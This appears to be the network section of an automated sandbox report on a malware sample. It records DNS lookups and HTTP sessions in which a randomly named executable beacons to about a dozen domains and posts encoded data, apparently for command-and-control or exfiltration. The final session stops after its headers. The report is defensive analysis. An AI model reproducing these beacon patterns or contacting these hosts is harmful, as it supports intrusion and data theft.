                                                        Sep 26, 2024 15:21:04.700665951 CEST5665753192.168.2.41.1.1.1
                                                        Sep 26, 2024 15:21:04.711281061 CEST53566571.1.1.1192.168.2.4
                                                        Sep 26, 2024 15:21:18.915807009 CEST6075353192.168.2.41.1.1.1
                                                        Sep 26, 2024 15:21:18.926311970 CEST53607531.1.1.1192.168.2.4
                                                        Sep 26, 2024 15:21:26.993693113 CEST6139453192.168.2.41.1.1.1
                                                        Sep 26, 2024 15:21:27.008966923 CEST53613941.1.1.1192.168.2.4
                                                        Sep 26, 2024 15:21:40.163455009 CEST5724653192.168.2.41.1.1.1
                                                        Sep 26, 2024 15:21:40.459666967 CEST53572461.1.1.1192.168.2.4
                                                        Sep 26, 2024 15:21:53.819669008 CEST6128853192.168.2.41.1.1.1
                                                        Sep 26, 2024 15:21:53.938651085 CEST53612881.1.1.1192.168.2.4
                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Sep 26, 2024 15:18:50.111732006 CEST192.168.2.41.1.1.10x3d79Standard query (0)www.aaavvejibej.bondA (IP address)IN (0x0001)false
                                                        Sep 26, 2024 15:19:05.694649935 CEST192.168.2.41.1.1.10xe19eStandard query (0)www.whats-in-the-box.orgA (IP address)IN (0x0001)false
                                                        Sep 26, 2024 15:19:21.789643049 CEST192.168.2.41.1.1.10xea12Standard query (0)www.weatherbook.liveA (IP address)IN (0x0001)false
                                                        Sep 26, 2024 15:19:35.038275957 CEST192.168.2.41.1.1.10xafc2Standard query (0)www.crowsecurity.cloudA (IP address)IN (0x0001)false
                                                        Sep 26, 2024 15:19:48.299657106 CEST192.168.2.41.1.1.10x86cStandard query (0)www.inspireplay.liveA (IP address)IN (0x0001)false
                                                        Sep 26, 2024 15:20:01.913448095 CEST192.168.2.41.1.1.10xaf87Standard query (0)www.shanhaiguan.netA (IP address)IN (0x0001)false
                                                        Sep 26, 2024 15:20:37.351030111 CEST192.168.2.41.1.1.10x90c3Standard query (0)www.lanxuanz.techA (IP address)IN (0x0001)false
                                                        Sep 26, 2024 15:20:50.929342985 CEST192.168.2.41.1.1.10xce53Standard query (0)www.selftip.topA (IP address)IN (0x0001)false
                                                        Sep 26, 2024 15:21:04.700665951 CEST192.168.2.41.1.1.10xd5e8Standard query (0)www.newdaydawning.netA (IP address)IN (0x0001)false
                                                        Sep 26, 2024 15:21:18.915807009 CEST192.168.2.41.1.1.10x8f85Standard query (0)www.kfowks.siteA (IP address)IN (0x0001)false
                                                        Sep 26, 2024 15:21:26.993693113 CEST192.168.2.41.1.1.10xf79Standard query (0)www.o731lh.vipA (IP address)IN (0x0001)false
                                                        Sep 26, 2024 15:21:40.163455009 CEST192.168.2.41.1.1.10xb696Standard query (0)www.wajf.netA (IP address)IN (0x0001)false
                                                        Sep 26, 2024 15:21:53.819669008 CEST192.168.2.41.1.1.10x919aStandard query (0)www.turbonotes.appA (IP address)IN (0x0001)false
                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Sep 26, 2024 15:18:50.138664961 CEST1.1.1.1192.168.2.40x3d79No error (0)www.aaavvejibej.bond172.67.181.150A (IP address)IN (0x0001)false
                                                        Sep 26, 2024 15:18:50.138664961 CEST1.1.1.1192.168.2.40x3d79No error (0)www.aaavvejibej.bond104.21.31.249A (IP address)IN (0x0001)false
                                                        Sep 26, 2024 15:19:05.715264082 CEST1.1.1.1192.168.2.40xe19eNo error (0)www.whats-in-the-box.orgwhats-in-the-box.orgCNAME (Canonical name)IN (0x0001)false
                                                        Sep 26, 2024 15:19:05.715264082 CEST1.1.1.1192.168.2.40xe19eNo error (0)whats-in-the-box.org3.33.130.190A (IP address)IN (0x0001)false
                                                        Sep 26, 2024 15:19:05.715264082 CEST1.1.1.1192.168.2.40xe19eNo error (0)whats-in-the-box.org15.197.148.33A (IP address)IN (0x0001)false
                                                        Sep 26, 2024 15:19:21.801938057 CEST1.1.1.1192.168.2.40xea12No error (0)www.weatherbook.liveweatherbook.liveCNAME (Canonical name)IN (0x0001)false
                                                        Sep 26, 2024 15:19:21.801938057 CEST1.1.1.1192.168.2.40xea12No error (0)weatherbook.live3.33.130.190A (IP address)IN (0x0001)false
                                                        Sep 26, 2024 15:19:21.801938057 CEST1.1.1.1192.168.2.40xea12No error (0)weatherbook.live15.197.148.33A (IP address)IN (0x0001)false
                                                        Sep 26, 2024 15:19:35.143299103 CEST1.1.1.1192.168.2.40xafc2No error (0)www.crowsecurity.cloudcrowsecurity.cloudCNAME (Canonical name)IN (0x0001)false
                                                        Sep 26, 2024 15:19:35.143299103 CEST1.1.1.1192.168.2.40xafc2No error (0)crowsecurity.cloud3.33.130.190A (IP address)IN (0x0001)false
                                                        Sep 26, 2024 15:19:35.143299103 CEST1.1.1.1192.168.2.40xafc2No error (0)crowsecurity.cloud15.197.148.33A (IP address)IN (0x0001)false
                                                        Sep 26, 2024 15:19:48.474137068 CEST1.1.1.1192.168.2.40x86cNo error (0)www.inspireplay.liveinspireplay.liveCNAME (Canonical name)IN (0x0001)false
                                                        Sep 26, 2024 15:19:48.474137068 CEST1.1.1.1192.168.2.40x86cNo error (0)inspireplay.live3.33.130.190A (IP address)IN (0x0001)false
                                                        Sep 26, 2024 15:19:48.474137068 CEST1.1.1.1192.168.2.40x86cNo error (0)inspireplay.live15.197.148.33A (IP address)IN (0x0001)false
                                                        Sep 26, 2024 15:20:02.572958946 CEST1.1.1.1192.168.2.40xaf87No error (0)www.shanhaiguan.net156.242.132.82A (IP address)IN (0x0001)false
                                                        Sep 26, 2024 15:20:37.660027027 CEST1.1.1.1192.168.2.40x90c3No error (0)www.lanxuanz.techzhs.zohosites.comCNAME (Canonical name)IN (0x0001)false
                                                        Sep 26, 2024 15:20:37.660027027 CEST1.1.1.1192.168.2.40x90c3No error (0)zhs.zohosites.com136.143.186.12A (IP address)IN (0x0001)false
                                                        Sep 26, 2024 15:20:51.365415096 CEST1.1.1.1192.168.2.40xce53No error (0)www.selftip.top199.192.21.169A (IP address)IN (0x0001)false
                                                        Sep 26, 2024 15:21:04.711281061 CEST1.1.1.1192.168.2.40xd5e8No error (0)www.newdaydawning.netnewdaydawning.netCNAME (Canonical name)IN (0x0001)false
                                                        Sep 26, 2024 15:21:04.711281061 CEST1.1.1.1192.168.2.40xd5e8No error (0)newdaydawning.net44.213.25.70A (IP address)IN (0x0001)false
                                                        Sep 26, 2024 15:21:18.926311970 CEST1.1.1.1192.168.2.40x8f85Name error (3)www.kfowks.sitenonenoneA (IP address)IN (0x0001)false
                                                        Sep 26, 2024 15:21:27.008966923 CEST1.1.1.1192.168.2.40xf79No error (0)www.o731lh.vipo731lh.vipCNAME (Canonical name)IN (0x0001)false
                                                        Sep 26, 2024 15:21:27.008966923 CEST1.1.1.1192.168.2.40xf79No error (0)o731lh.vip3.33.130.190A (IP address)IN (0x0001)false
                                                        Sep 26, 2024 15:21:27.008966923 CEST1.1.1.1192.168.2.40xf79No error (0)o731lh.vip15.197.148.33A (IP address)IN (0x0001)false
                                                        Sep 26, 2024 15:21:40.459666967 CEST1.1.1.1192.168.2.40xb696No error (0)www.wajf.netcomingsoon.namebright.comCNAME (Canonical name)IN (0x0001)false
                                                        Sep 26, 2024 15:21:40.459666967 CEST1.1.1.1192.168.2.40xb696No error (0)comingsoon.namebright.comcdl-lb-1356093980.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                        Sep 26, 2024 15:21:40.459666967 CEST1.1.1.1192.168.2.40xb696No error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com44.207.39.65A (IP address)IN (0x0001)false
                                                        Sep 26, 2024 15:21:40.459666967 CEST1.1.1.1192.168.2.40xb696No error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com44.199.117.82A (IP address)IN (0x0001)false
                                                        Sep 26, 2024 15:21:53.938651085 CEST1.1.1.1192.168.2.40x919aNo error (0)www.turbonotes.appwebredir.vip.gandi.netCNAME (Canonical name)IN (0x0001)false
                                                        Sep 26, 2024 15:21:53.938651085 CEST1.1.1.1192.168.2.40x919aNo error (0)webredir.vip.gandi.net217.70.184.50A (IP address)IN (0x0001)false
                                                        • www.aaavvejibej.bond
                                                        • www.whats-in-the-box.org
                                                        • www.weatherbook.live
                                                        • www.crowsecurity.cloud
                                                        • www.inspireplay.live
                                                        • www.shanhaiguan.net
                                                        • www.lanxuanz.tech
                                                        • www.selftip.top
                                                        • www.newdaydawning.net
                                                        • www.o731lh.vip
                                                        • www.wajf.net
                                                        • www.turbonotes.app
                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.449739172.67.181.150803844C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 15:18:50.162585020 CEST520OUTGET /lpl9/?wrRLLPUh=e8lWkFdpBI8fMqvrlwy/onG3BcZVz7zQmYaHg/xvgOUuLw6B3kGtYYWM8/CK9QzH2IDr1kJuLXtu8i/nZF8LLdKb2VMPvKTLf5QxvZUWo2Nd+FhaQzJMI4o=&IH=BP3PrJvHc6MXcF HTTP/1.1
                                                        Host: www.aaavvejibej.bond
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                        Accept-Language: en-us
                                                        Connection: close
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                                        Sep 26, 2024 15:18:50.646886110 CEST746INHTTP/1.1 403 Forbidden
                                                        Date: Thu, 26 Sep 2024 13:18:50 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 16
                                                        Connection: close
                                                        X-Frame-Options: SAMEORIGIN
                                                        Referrer-Policy: same-origin
                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fvXf1Ibbk2%2FSjDLsBCIrQsZs4%2F%2BpnN6RSvRBR9C%2FDxphf3fXhpBthxY04XnZSt59APcJWiqo1WKP7wOX%2Fko221G1TtaPeLo5hVZAEjh04zv49tvZmiAk6nI1VKiW4ypdS2NfQEz4Hg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8c938acdf80c41e9-EWR
                                                        Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 31 30
                                                        Data Ascii: error code: 1010


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.4497403.33.130.190803844C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 15:19:05.733509064 CEST798OUTPOST /30jd/ HTTP/1.1
                                                        Host: www.whats-in-the-box.org
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                        Accept-Language: en-us
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.whats-in-the-box.org
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Length: 205
                                                        Referer: http://www.whats-in-the-box.org/30jd/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                                        Data Raw: 77 72 52 4c 4c 50 55 68 3d 44 76 72 2b 4f 48 70 57 51 62 73 38 37 68 49 79 6a 33 33 43 37 66 5a 46 52 48 55 35 77 50 39 4b 56 72 4d 64 43 68 4b 39 75 35 2b 69 75 65 55 38 4e 32 45 6c 6f 48 7a 56 64 64 57 47 45 70 69 50 4e 41 68 53 50 34 4f 30 55 4c 39 35 79 34 47 76 63 79 4e 65 65 36 6f 64 53 4c 70 55 6d 76 50 48 78 30 77 76 76 69 59 39 75 51 49 59 63 44 6f 6f 31 73 62 63 32 39 51 65 50 58 6f 2b 58 71 48 37 79 79 73 4a 64 32 70 36 4d 65 64 34 68 2b 39 35 77 6b 38 70 45 46 6a 53 76 57 6e 66 53 4c 47 35 65 4f 43 4e 59 2f 50 76 69 53 4c 39 64 43 6a 30 66 61 46 57 61 4f 64 78 70 46 7a 4d 4e 54 6c 67 73 67 3d 3d
                                                        Data Ascii: wrRLLPUh=Dvr+OHpWQbs87hIyj33C7fZFRHU5wP9KVrMdChK9u5+iueU8N2EloHzVddWGEpiPNAhSP4O0UL95y4GvcyNee6odSLpUmvPHx0wvviY9uQIYcDoo1sbc29QePXo+XqH7yysJd2p6Med4h+95wk8pEFjSvWnfSLG5eOCNY/PviSL9dCj0faFWaOdxpFzMNTlgsg==


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.4497413.33.130.190803844C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 15:19:08.273061991 CEST818OUTPOST /30jd/ HTTP/1.1
                                                        Host: www.whats-in-the-box.org
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                        Accept-Language: en-us
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.whats-in-the-box.org
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Length: 225
                                                        Referer: http://www.whats-in-the-box.org/30jd/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                                        Data Raw: 77 72 52 4c 4c 50 55 68 3d 44 76 72 2b 4f 48 70 57 51 62 73 38 36 42 34 79 73 33 4c 43 39 2f 5a 43 50 33 55 35 36 76 39 4f 56 71 77 64 43 67 4f 74 74 4b 4b 69 67 62 6f 38 4f 30 73 6c 76 48 7a 56 4a 4e 57 44 41 70 6a 69 4e 41 6b 74 50 35 79 30 55 4c 70 35 79 36 65 76 66 41 6c 5a 45 4b 6f 66 61 72 70 73 70 50 50 48 78 30 77 76 76 69 4d 48 75 51 41 59 63 79 34 6f 31 4a 76 66 71 74 51 66 4f 58 6f 2b 42 61 48 2f 79 79 73 72 64 79 78 63 4d 62 42 34 68 38 6c 35 7a 78 49 71 66 31 6a 59 69 32 6e 50 58 4b 32 39 48 4f 37 44 58 76 50 4f 72 43 50 6c 59 45 79 75 4f 72 6b 42 49 4f 35 43 30 43 36 34 41 51 59 70 33 6e 39 73 4b 47 39 42 78 6f 6e 51 67 42 58 43 6e 64 56 6f 52 57 77 3d
                                                        Data Ascii: wrRLLPUh=Dvr+OHpWQbs86B4ys3LC9/ZCP3U56v9OVqwdCgOttKKigbo8O0slvHzVJNWDApjiNAktP5y0ULp5y6evfAlZEKofarpspPPHx0wvviMHuQAYcy4o1JvfqtQfOXo+BaH/yysrdyxcMbB4h8l5zxIqf1jYi2nPXK29HO7DXvPOrCPlYEyuOrkBIO5C0C64AQYp3n9sKG9BxonQgBXCndVoRWw=


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.4497423.33.130.190803844C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 15:19:10.820157051 CEST10900OUTPOST /30jd/ HTTP/1.1
                                                        Host: www.whats-in-the-box.org
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                        Accept-Language: en-us
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.whats-in-the-box.org
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Length: 10305
                                                        Referer: http://www.whats-in-the-box.org/30jd/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                                        Data Raw: 77 72 52 4c 4c 50 55 68 3d 44 76 72 2b 4f 48 70 57 51 62 73 38 36 42 34 79 73 33 4c 43 39 2f 5a 43 50 33 55 35 36 76 39 4f 56 71 77 64 43 67 4f 74 74 4c 79 69 67 70 77 38 4f 56 73 6c 75 48 7a 56 57 39 57 43 41 70 6a 61 4e 41 64 6b 50 35 2b 4f 55 4a 52 35 79 62 2b 76 58 52 6c 5a 4b 36 6f 66 59 72 70 58 6d 76 4f 48 78 30 67 72 76 69 63 48 75 51 41 59 63 78 77 6f 7a 63 62 66 6f 74 51 65 50 58 6f 79 58 71 48 62 79 79 6b 61 64 79 6c 71 4e 6f 5a 34 68 63 31 35 32 48 6b 71 54 31 6a 57 78 47 6d 51 58 4b 37 6a 48 4f 6e 35 58 73 54 6f 72 41 54 6c 56 51 6a 7a 5a 71 41 66 53 2f 6c 45 69 68 4f 77 47 51 56 72 76 41 31 47 47 47 42 46 75 5a 72 41 73 53 61 67 77 65 5a 6f 4f 51 55 51 4d 4d 32 70 71 68 38 35 62 45 30 37 41 46 44 7a 77 49 64 4e 6c 55 77 47 48 48 6e 31 74 4f 4c 49 71 77 7a 65 2b 32 77 6b 65 7a 61 35 4c 35 43 48 4c 56 74 73 44 5a 4c 51 68 77 73 59 4e 2b 37 32 38 65 38 79 6f 6a 6c 56 35 52 45 6d 4d 6d 4d 31 43 7a 59 78 4d 77 72 69 54 2b 65 47 56 79 69 50 76 7a 50 49 69 4f 48 71 52 55 30 62 52 35 77 76 6c [TRUNCATED]
                                                        Data Ascii: wrRLLPUh=Dvr+OHpWQbs86B4ys3LC9/ZCP3U56v9OVqwdCgOttLyigpw8OVsluHzVW9WCApjaNAdkP5+OUJR5yb+vXRlZK6ofYrpXmvOHx0grvicHuQAYcxwozcbfotQePXoyXqHbyykadylqNoZ4hc152HkqT1jWxGmQXK7jHOn5XsTorATlVQjzZqAfS/lEihOwGQVrvA1GGGBFuZrAsSagweZoOQUQMM2pqh85bE07AFDzwIdNlUwGHHn1tOLIqwze+2wkeza5L5CHLVtsDZLQhwsYN+728e8yojlV5REmMmM1CzYxMwriT+eGVyiPvzPIiOHqRU0bR5wvlJAu0vWRbfYfWY5Wsg5LrGhj/iLI0e3itSf2W4ez7Xl2kI0M2Qjh8dXMErgMQsamLoJ/I/8jiHOZiyOvD2rPlMsOTU/U5LFxyVUHfZwbhVBnSSst3HULQ5fD7FG6EPIXTZREfV575tshlv3qGzFKbKtCtGbAR1GYeIKkgvWUJ2Mjegzmcc18mkDcy1ktjn7puw8+eQwQqksYU21lLAKZikHw3NhVYXnLN7QN3+NL4QjNXI4bSXAvFxLW/tKCqz5q3irJk0PyoQu5ZE5MxAg3zmr5gw259kqoIII7+aY3/dtU2ak4E0Q+aTD4huvWg1Pw9QHwP8MXmQmykLLb4q/HcwwH48D+v0kGK5keXqTh2TOZyp0NBEZbnr95xKukRKtin/y1R67ZOr7RBWWD8DoaCIBPaHJafR8yoaNMPJUup5Ze/cmsOGsTcbmXhu6scqfhKReGtwbq7rFqR3sepf4ObKRo0RzNJoV8YnnaJOF1UjjT4Lo2J8K74zHzUGrHzuseAHq2n7aGTFvWhjmDdhHRgWLlpJlANYnyylBb78nY1gVquf3/exV7mOoa7ycp6dJEQvGPmUKcu7ZHMY2nvb/A3wmxot9mmXDKwKnpLyVhmqu8LkPf3fVG9aXEQshoXXqSl4W54LtbL1kU+QkC/Egiv8H9Yblt4S/mYJY [TRUNCATED]


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.2.4497433.33.130.190803844C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 15:19:13.362517118 CEST524OUTGET /30jd/?wrRLLPUh=OtDeNxpSfKodwTIu4nnA+ux6enUP6PpldrB0PRj1l4+Fh7wLXn4C+U6iIOCzG6zWS3UsP4q8AKFA04SbUzJ+fbd5Tc1EuJbYoHYXowwdmRoBcyVO6/LzqMo=&IH=BP3PrJvHc6MXcF HTTP/1.1
                                                        Host: www.whats-in-the-box.org
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                        Accept-Language: en-us
                                                        Connection: close
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                                        Sep 26, 2024 15:19:16.738533974 CEST402INHTTP/1.1 200 OK
                                                        Server: openresty
                                                        Date: Thu, 26 Sep 2024 13:19:16 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 262
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 77 72 52 4c 4c 50 55 68 3d 4f 74 44 65 4e 78 70 53 66 4b 6f 64 77 54 49 75 34 6e 6e 41 2b 75 78 36 65 6e 55 50 36 50 70 6c 64 72 42 30 50 52 6a 31 6c 34 2b 46 68 37 77 4c 58 6e 34 43 2b 55 36 69 49 4f 43 7a 47 36 7a 57 53 33 55 73 50 34 71 38 41 4b 46 41 30 34 53 62 55 7a 4a 2b 66 62 64 35 54 63 31 45 75 4a 62 59 6f 48 59 58 6f 77 77 64 6d 52 6f 42 63 79 56 4f 36 2f 4c 7a 71 4d 6f 3d 26 49 48 3d 42 50 33 50 72 4a 76 48 63 36 4d 58 63 46 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?wrRLLPUh=OtDeNxpSfKodwTIu4nnA+ux6enUP6PpldrB0PRj1l4+Fh7wLXn4C+U6iIOCzG6zWS3UsP4q8AKFA04SbUzJ+fbd5Tc1EuJbYoHYXowwdmRoBcyVO6/LzqMo=&IH=BP3PrJvHc6MXcF"}</script></head></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.2.4497443.33.130.190803844C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 15:19:21.913110018 CEST786OUTPOST /4hiy/ HTTP/1.1
                                                        Host: www.weatherbook.live
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                        Accept-Language: en-us
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.weatherbook.live
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Length: 205
                                                        Referer: http://www.weatherbook.live/4hiy/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                                        Data Raw: 77 72 52 4c 4c 50 55 68 3d 38 35 57 57 4c 4a 50 42 72 58 69 36 45 70 54 58 30 7a 64 54 67 35 56 50 39 6b 55 75 37 51 77 35 59 39 4c 6d 6c 76 49 64 55 76 43 6f 33 55 57 56 50 77 73 4e 6b 61 44 54 52 70 34 6e 59 58 4b 72 45 75 71 38 49 41 55 31 48 65 2b 2f 70 44 57 78 33 51 43 41 41 72 6a 2f 45 44 2b 6a 37 4c 4d 46 79 59 47 51 2f 59 30 41 35 4a 57 73 48 6e 2b 48 48 4f 6d 71 42 62 47 74 49 49 76 63 4e 55 56 53 4a 76 39 72 33 39 7a 74 76 30 71 45 6c 43 78 32 74 6e 30 35 35 61 6a 38 56 5a 78 32 7a 47 71 56 59 4a 76 69 42 49 65 6f 59 4e 61 73 77 49 6c 2b 41 4e 72 42 5a 38 53 68 6e 68 45 65 6d 33 76 6f 6b 77 3d 3d
                                                        Data Ascii: wrRLLPUh=85WWLJPBrXi6EpTX0zdTg5VP9kUu7Qw5Y9LmlvIdUvCo3UWVPwsNkaDTRp4nYXKrEuq8IAU1He+/pDWx3QCAArj/ED+j7LMFyYGQ/Y0A5JWsHn+HHOmqBbGtIIvcNUVSJv9r39ztv0qElCx2tn055aj8VZx2zGqVYJviBIeoYNaswIl+ANrBZ8ShnhEem3vokw==


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.2.4497453.33.130.190803844C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 15:19:24.473990917 CEST806OUTPOST /4hiy/ HTTP/1.1
                                                        Host: www.weatherbook.live
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                        Accept-Language: en-us
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.weatherbook.live
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Length: 225
                                                        Referer: http://www.weatherbook.live/4hiy/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                                        Data Raw: 77 72 52 4c 4c 50 55 68 3d 38 35 57 57 4c 4a 50 42 72 58 69 36 46 4a 44 58 7a 51 31 54 6c 5a 56 4d 7a 45 55 75 69 41 77 39 59 39 48 6d 6c 72 34 4e 55 38 71 6f 30 78 53 56 4f 78 73 4e 6e 61 44 54 4a 5a 34 6d 48 48 4c 6e 45 75 33 63 49 42 6f 31 48 61 57 2f 70 44 6d 78 30 68 43 44 47 37 6a 35 4f 54 2b 6c 6b 62 4d 46 79 59 47 51 2f 59 67 36 35 4a 65 73 48 55 57 48 45 72 61 74 43 62 47 75 42 6f 76 63 61 45 56 57 4a 76 38 4d 33 35 7a 58 76 78 75 45 6c 41 70 32 71 31 51 34 67 71 6a 36 4c 70 77 45 39 33 48 37 55 72 7a 7a 42 72 53 4b 47 2f 53 37 78 4f 30 6b 52 38 4b 57 4c 38 32 53 36 6d 4e 71 72 30 53 68 2f 38 6b 33 74 45 4d 47 58 30 65 79 74 73 74 6d 67 32 48 31 53 78 67 3d
                                                        Data Ascii: wrRLLPUh=85WWLJPBrXi6FJDXzQ1TlZVMzEUuiAw9Y9Hmlr4NU8qo0xSVOxsNnaDTJZ4mHHLnEu3cIBo1HaW/pDmx0hCDG7j5OT+lkbMFyYGQ/Yg65JesHUWHEratCbGuBovcaEVWJv8M35zXvxuElAp2q1Q4gqj6LpwE93H7UrzzBrSKG/S7xO0kR8KWL82S6mNqr0Sh/8k3tEMGX0eytstmg2H1Sxg=


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        7192.168.2.4497463.33.130.190803844C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 15:19:27.029966116 CEST10888OUTPOST /4hiy/ HTTP/1.1
                                                        Host: www.weatherbook.live
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                        Accept-Language: en-us
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.weatherbook.live
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Length: 10305
                                                        Referer: http://www.weatherbook.live/4hiy/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
